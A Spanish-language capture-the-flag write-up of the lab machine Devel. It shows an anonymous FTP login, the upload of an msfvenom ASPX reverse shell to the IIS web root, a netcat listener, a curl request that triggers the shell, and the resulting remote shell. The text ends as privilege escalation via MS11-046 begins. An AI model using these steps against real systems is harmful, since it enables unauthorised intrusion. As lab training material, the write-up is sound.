En este post realizaremos el write up de la máquina Devel. Tocaremos los conceptos de conexión por ftp con las credenciales anonymous:anonymous, crearemos una reverse shell en formato aspx utilizando msfvenom y escalaremos privilegios a través de la vulnerabilidad CVE-2011-1249 bautizada como MS11-046.
Reconocimiento
Escaneo De Puertos
Escaneamos con nmap los puertos abiertos en la máquina Devel:
Podemos observar que tenemos acceso al ftp por anonymous:anonymous y que el servidor web está utilizando Microsoft IIS 7.5, Hacktricks.
Ftp
Si accedemos por ftp con las credenciales anonymous:anonymous parece ser que estamos en la ruta donde se aloja el contenido del servidor web.
1 2 3 4 5 6 7 8 9 10 11 12 13 14
❯ ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:void4m0n): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 229 Entering Extended Passive Mode (|||49169|) 125 Data connection already open; Transfer starting. 03-18-17 02:06AM <DIR> aspnet_client 03-17-17 05:37PM 689 iisstart.htm 03-17-17 05:37PM 184946 welcome.png
Tenemos permisos de escritura, por lo que podríamos intentar subir una reverse shell.
Explotación
Intrusion
Creacion De La Revshell
Mediante msfvenom creamos una reverse shell en formato ejecutable aspx, este es el formato ejecutable para los Microsoft-IIS.
ftp> put revshell.aspx local: revshell.aspx remote: revshell.aspx 229 Entering Extended Passive Mode (|||49178|) 125 Data connection already open; Transfer starting. 100% |****************************| 2739 28.39 MiB/s --:-- ETA 226 Transfer complete. 2739 bytes sent in 00:00 (18.83 KiB/s)
Recibir La Conexion
1 - Nos ponemos por escucha en el puerto indicado, haciendo uso de rlwrap para disponer de una shell más interactiva.
1 2
rlwrap nc -lvnp 1234 listening on [any] 1234 ...
2 - Hacemos una petición por GET a revshell.aspx.
1
curl -s -X GET "http://10.10.10.5/revshell.aspx"
3 - Recibimos la conexión.
1 2 3 4 5 6 7
❯ rlwrap nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.16.2] from (UNKNOWN) [10.10.10.5] 49181 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>
Escalada De Privilegios
Una vez tenemos la shell, hacemos systeminfo para observar exactamente a que versión de windows nos estamos enfrentando.